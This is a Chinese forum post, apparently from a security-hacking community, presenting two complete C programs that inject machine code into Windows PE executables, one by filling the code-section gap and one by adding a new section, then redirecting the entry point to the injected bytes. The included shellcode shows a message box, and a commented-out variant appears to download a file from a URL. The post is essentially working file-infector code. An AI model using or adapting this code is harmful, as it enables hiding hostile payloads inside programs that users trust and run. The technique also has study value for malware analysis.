[原创]俩种方式实现注入机器码
文章作者:小浩信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
PE插缝:
[language=c]
//by 小浩 Q82602935
#include "stdafx.h"
#include <io.h>
#include <sys\stat.h>
#include <fcntl.h>
#include <stdio.h>
typedef struct tagPeInfo
{
DWORD dwPeNewEntryAddress;
DWORD dwPeOldEntryAddress;
DWORD dwPePhysicalSize;
DWORD dwPePhysicalAddress;
DWORD dwPeVirtualSize;
DWORD dwPeAddress;
DWORD dwPegapsize;
DWORD dwPeCodeoffset;
DWORD dwPeEntryoffset;
}PeInfo,*PPeInfo;
typedef struct PE_HEADER_MAP
{
DWORD Signature;
IMAGE_FILE_HEADER _head;
IMAGE_OPTIONAL_HEADER opt_head;
IMAGE_SECTION_HEADER section_header[6];
}peHeader;
/*unsigned char szHexCode[] = {0x6A ,0x40 ,0xE8 ,0x15 ,0x00 ,0x00 ,0x00 ,0xCE ,0xDE ,0xCC,
0xF5 ,0xBC ,0xFE ,0xCE ,0xAA ,0xC4 ,0xE3 ,0xA3 ,0xAC ,0xBB,
0xB6 ,0xD3 ,0xAD ,0xC4 ,0xFA ,0xA3 ,0xA1 ,0x00 ,0xE8 ,0x06 ,
0x00 ,0x00 ,0x00 ,0x68 ,0x65 ,0x6C ,0x6C ,0x6F ,0x00 ,0x6A ,
0x00 ,0xB8 ,0x8A ,0x05 ,0xD5 ,0x77 ,0xFF ,0xD0 ,0xe9 ,0x00 ,
0x00 ,0x00 ,0x00 };
*/
unsigned char szHexCode[]={0x6A,0x40,0xE8,0x06,0x00,0x00,0x00,0x78,
0x34,0x68,0x00,0xEB,0x09,0xE8,0x04,0x00,0x00,0x00,0x78,0x34,0x68,
0x00,0x6A,0x00,0xB8,0x8A,0x05,0xD5,0x77,0xFF,0xD0,0xe9,0x00,0x00,0x00,0x00};
/*
/*unsigned char szHexCode[]={
0x8B,0xF4,0x68,0x30,0xF0,0x41,0x00,0xFF,0x15,0x3C,
0x41,0x42,0x00,0x3B,0xF4,0xE8,0xA4,0x00,0x00,0x00,
0x89,0x45,0xFC,0x8B,0xF4,0x68,0x1C,0xF0,0x41,0x00,
0x8B,0x45,0xFC,0x50,0xFF,0x15,0x38,0x41,0x42,0x00,
0x3B,0xF4,0xE8,0x89,0x00,0x00,0x00,0x89,0x45,0xF8,
0x6A,0x00,0x6A,0x00,0xE8,0x07,0x00,0x00,0x00,0x63,
0x3A,0x5C,0x31,0x2E,0x67,0x00,0xE8,0x22,0x00,0x00,
0x00,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x77,0x77,
0x77,0x2E,0x62,0x61,0x69,0x64,0x75,0x2E,0x63,0x6F,
0x6D,0x2F,0x69,0x6D,0x67,0x2F,0x6C,0x6F,0x67,0x6F,
0x2E,0x67,0x69,0x66,0x00,0x6A,0x00,0xF8,0xFF,0xD0,
0xe9,0x00,0x00,0x00,0x00};
*/
int GetPeInfo(void *vBasepointer,PPeInfo Peinfo)
{
IMAGE_DOS_HEADER *iDosHeader=(IMAGE_DOS_HEADER*)vBasepointer;
if(iDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
{
MessageBox(NULL,"Unknown type of file","Unknown type of file",NULL);
return 0;
}
peHeader *pEheader=(peHeader*)((char*)iDosHeader+iDosHeader->e_lfanew);
if(pEheader->Signature!=IMAGE_NT_SIGNATURE)
{
MessageBox(NULL,"Unknown type of file","Unknown type of file",NULL);
return 0;
}
char *szRet=strstr((const char*)pEheader->section_header[0].Name,".text");
if(!szRet)
{
MessageBox(NULL,"Unknown type of file","Unknown type of file",NULL);
return 0;
}
Peinfo->dwPeAddress=iDosHeader->e_lfanew;
Peinfo->dwPeVirtualSize=pEheader->section_header[0].Misc.VirtualSize; //真实长度
Peinfo->dwPePhysicalAddress=pEheader->section_header[0].PointerToRawData; //物理偏移
Peinfo->dwPePhysicalSize=pEheader->section_header[0].SizeOfRawData; //物理长度
Peinfo->dwPegapsize=Peinfo->dwPePhysicalSize
-Peinfo->dwPeVirtualSize; //缝隙大小
Peinfo->dwPeCodeoffset=pEheader->opt_head.BaseOfCode
-Peinfo->dwPePhysicalAddress; //加载到内存中的代码段与文件中的代码段的差
Peinfo->dwPeEntryoffset=pEheader->section_header[0].PointerToRawData
+pEheader->section_header[0].Misc.VirtualSize; //代码写入的物理偏移
DWORD dwMods=Peinfo->dwPeEntryoffset%16;
if(dwMods!=0)
{
Peinfo->dwPeEntryoffset+=(16-dwMods);
}
Peinfo->dwPeOldEntryAddress=pEheader->opt_head.AddressOfEntryPoint; //OEP
Peinfo->dwPeNewEntryAddress=Peinfo->dwPeEntryoffset+Peinfo->dwPeCodeoffset; //程序新入口地址
return 1;
}
CString StrOfDWord(DWORD dwAddress)
{
unsigned char waddress[4]={0};
waddress[3]=(char)(dwAddress>>24)&0xFF;
waddress[2]=(char)(dwAddress>>16)&0xFF;
waddress[1]=(char)(dwAddress>>8 )&0xFF;
waddress[0]=(char)(dwAddress )&0xFF;
return waddress;
}
int WriteCodeTofile(char szFilePath[],PPeInfo Peinfo)
{
int nTolen=sizeof(szHexCode);
DWORD dwRet;
int nRet=_open(szFilePath,_O_RDWR | _O_CREAT | _O_BINARY,_S_IREAD | _S_IWRITE);
if(!nRet)
{
MessageBox(NULL,"_open Error!","_open Error!",NULL);
return 0;
}
dwRet=_lseek(nRet,(long)Peinfo->dwPeAddress+40,SEEK_SET);
if(dwRet==-1)
{
MessageBox(NULL,"_lseek Error!","_lseek Error!",NULL);
return 0;
}
char szWaddress[4]={0};
memcpy(szWaddress,StrOfDWord(Peinfo->dwPeNewEntryAddress),4);
dwRet=_write(nRet,szWaddress,4);
if(dwRet==-1)
{
MessageBox(NULL,"_write Error!","_write Error!",NULL);
return 0;
}
/* CString szMsgA;
DWORD dwMessageBoxAadaddress;
HINSTANCE gLibMsg=LoadLibrary("user32.dll");
dwMessageBoxAadaddress=(DWORD)GetProcAddress(gLibMsg,"MessageBoxA");
szMsgA=StrOfDWord(dwMessageBoxAadaddress);
*/
CString szOepA;
DWORD dwAddress;
dwAddress = 0-(Peinfo->dwPeNewEntryAddress
-Peinfo->dwPeOldEntryAddress+nTolen);
szOepA=StrOfDWord(dwAddress);
for(int i=0;i<4;i++)
{
szHexCode[32+i]=szOepA.GetAt(i);
}
dwRet=_lseek(nRet,(long)Peinfo->dwPeEntryoffset,SEEK_SET);
if(dwRet==-1)
{
MessageBox(NULL,"_lseek Error!","_lseek Error!",NULL);
return 0;
}
dwRet=_write(nRet,szHexCode,nTolen);
if(dwRet==-1)
{
MessageBox(NULL,"_write Error!","_write Error!",NULL);
return 0;
}
_close(nRet);
return 1;
}
int InjectCodeToFile(char szFilePath[])
{
HANDLE hFile=CreateFile(szFilePath,GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_FLAG_SEQUENTIAL_SCAN,0);
if(hFile==INVALID_HANDLE_VALUE)
{
MessageBox(NULL,"CreateFile Error!","CreateFile Error!",NULL);
return 0;
}
HANDLE hMapping=CreateFileMapping(hFile,0,PAGE_READONLY | SEC_COMMIT,0,0,0);
if(!hMapping)
{
MessageBox(NULL,"CreateFileMapping Error!","CreateFileMapping Error!",NULL);
return 0;
}
void *vBasepointer=MapViewOfFile(hMapping,FILE_MAP_READ,0,0,0);
if(!vBasepointer)
{
MessageBox(NULL,"MapViewOfFile Error!","MapViewOfFile Error!",NULL);
return 0;
}
CloseHandle(hFile);
CloseHandle(hMapping);
PeInfo pEinfo;
int nRet=GetPeInfo(vBasepointer,&pEinfo);
if(!nRet)
return 0;
UnmapViewOfFile(vBasepointer);
if(pEinfo.dwPegapsize<sizeof(szHexCode))
{
MessageBox(NULL,"No room to write the data!","No room to write the data!",NULL);
return 0;
}
WriteCodeTofile(szFilePath,&pEinfo);
return 1;
}
void main()
{
char szFilePath[MAX_PATH];
printf("Please Input File Path:");
scanf("%s",&szFilePath);
char szFileBak[MAX_PATH];
lstrcpy(szFileBak,szFilePath);
lstrcat(szFileBak,".bak");
CopyFile(szFilePath,szFileBak,FALSE);
InjectCodeToFile(szFilePath);
}
[/code]
PE添节:
[code]
//转载请注明 By 小浩 QQ:82602935
#include <afx.h>
#include <stdio.h>
#include <assert.h>
unsigned char szHexCode[]={0x6A,0x40,0xE8,0x06,0x00,0x00,0x00,0x78,
0x34,0x68,0x00,0xEB,0x09,0xE8,0x04,0x00,0x00,0x00,0x78,0x34,0x68,
0x00,0x6A,0x00,0xB8,0x8A,0x05,0xD5,0x77,0xFF,0xD0,0xe9,0x00,0x00,0x00,0x00};
CString StrOfDWord(DWORD dwAddress)
{
unsigned char waddress[4]={0};
waddress[3]=(char)(dwAddress>>24)&0xFF;
waddress[2]=(char)(dwAddress>>16)&0xFF;
waddress[1]=(char)(dwAddress>>8 )&0xFF;
waddress[0]=(char)(dwAddress )&0xFF;
return waddress;
}
int Align(int size, int ALIGN_BASE)
{
int ret;
int result;
assert( 0 != ALIGN_BASE );
result = size % ALIGN_BASE;
if (0 != result)
{
ret = ((size / ALIGN_BASE) + 1) * ALIGN_BASE;
}
else
{
ret = size;
}
return ret;
}
void main()
{
char szFilePath[MAX_PATH]={0};
printf("Please Input FilePath:");
scanf("%s",&szFilePath);
char szFilaBak[MAX_PATH]={0};
lstrcpy(szFilaBak,szFilePath);
lstrcat(szFilaBak,".bak");
int nRet=CopyFile(szFilePath,szFilaBak,FALSE);
if(!nRet)
{
printf("CopyFile Error!\r\n");
return;
}
FILE *pFile;
pFile=fopen(szFilePath,"rb+");
if(pFile==NULL)
{
printf("fopen Error!\r\n");
return;
}
fseek(pFile,0,SEEK_SET);
IMAGE_DOS_HEADER iMageDosHeader;
fread(&iMageDosHeader,sizeof(IMAGE_DOS_HEADER),1,pFile);
if(iMageDosHeader.e_magic!=IMAGE_DOS_SIGNATURE)
{
printf("Unknown type of file!\r\n");
return;
}
fseek(pFile,iMageDosHeader.e_lfanew,SEEK_SET);
IMAGE_NT_HEADERS iMageNtHeaders;
fread(&iMageNtHeaders,sizeof(IMAGE_NT_HEADERS),1,pFile);
if(iMageNtHeaders.Signature!=IMAGE_NT_SIGNATURE)
{
printf("Unknown type of file!\r\n");
return;
}
int nNumOfSections=iMageNtHeaders.FileHeader.NumberOfSections;
printf("%d Segment\r\n",nNumOfSections);
int nFileAlignMent,nSectionAlignMent;
nFileAlignMent=iMageNtHeaders.OptionalHeader.FileAlignment;
nSectionAlignMent=iMageNtHeaders.OptionalHeader.SectionAlignment;
printf("File Align Ment:%x\r\n",nFileAlignMent);
printf("Section Align Ment:%x\r\n",nSectionAlignMent);
DWORD dwOldOEP=iMageNtHeaders.OptionalHeader.AddressOfEntryPoint;
printf("File OEP:%08x\r\n",dwOldOEP);
IMAGE_SECTION_HEADER iMageSectionHeader;
for(int i=0;i<nNumOfSections;i++)
{
fread(&iMageSectionHeader,sizeof(IMAGE_SECTION_HEADER),1,pFile);
printf("Segment name:%s\r\n",iMageSectionHeader.Name);
}
IMAGE_SECTION_HEADER iMageNewSection;
memset(&iMageNewSection,0,sizeof(IMAGE_SECTION_HEADER));
strncpy((char*)iMageNewSection.Name,".x4h",strlen(".x4h"));
iMageNewSection.VirtualAddress=Align(iMageSectionHeader.VirtualAddress
+iMageSectionHeader.Misc.VirtualSize,nSectionAlignMent);
int extraLengthAfterAlign=Align(30,nFileAlignMent);
iMageNewSection.Misc.VirtualSize=Align(extraLengthAfterAlign,nSectionAlignMent);
iMageNewSection.PointerToRawData=Align(iMageSectionHeader.PointerToRawData
+iMageSectionHeader.SizeOfRawData,nFileAlignMent);
iMageNewSection.SizeOfRawData=Align(0x1000,nFileAlignMent);
iMageNewSection.Characteristics=0xE0000020;
iMageNtHeaders.FileHeader.NumberOfSections++;
iMageNtHeaders.OptionalHeader.SizeOfCode=Align(iMageNtHeaders.OptionalHeader.SizeOfCode
+0x1000,nFileAlignMent);
iMageNtHeaders.OptionalHeader.SizeOfImage=iMageNtHeaders.OptionalHeader.SizeOfImage
+Align(0x1000,nSectionAlignMent);
iMageNtHeaders.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;
iMageNtHeaders.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;
iMageNtHeaders.OptionalHeader.AddressOfEntryPoint=iMageNewSection.VirtualAddress;
fseek(pFile,0,SEEK_END);
fseek(pFile,iMageDosHeader.e_lfanew+sizeof(IMAGE_NT_HEADERS)
+nNumOfSections*sizeof(IMAGE_SECTION_HEADER),SEEK_SET);
fwrite(&iMageNewSection,sizeof(IMAGE_SECTION_HEADER),1,pFile);
fseek(pFile,iMageDosHeader.e_lfanew,SEEK_SET);
fwrite(&iMageNtHeaders,sizeof(IMAGE_NT_HEADERS),1,pFile);
fseek(pFile,0,SEEK_END);
CString szOepA;
DWORD dwAddress;
dwAddress = 0-(iMageNewSection.VirtualAddress-dwOldOEP+sizeof(szHexCode));
szOepA=StrOfDWord(dwAddress);
for(i=0;i<4;i++)
{
szHexCode[32+i]=szOepA.GetAt(i);
}
for (i=0; i<Align(0x1000,nFileAlignMent);i++)
{
fputc(0,pFile);
}
fseek(pFile,iMageNewSection.PointerToRawData,SEEK_SET);
for (i=0; i<sizeof(szHexCode);i++)
{
fputc(szHexCode[i],pFile);
}
fclose(pFile);
}
[/language]
产生呕吐,板砖效应一概不负责[s:264][s:287]
页:
[1]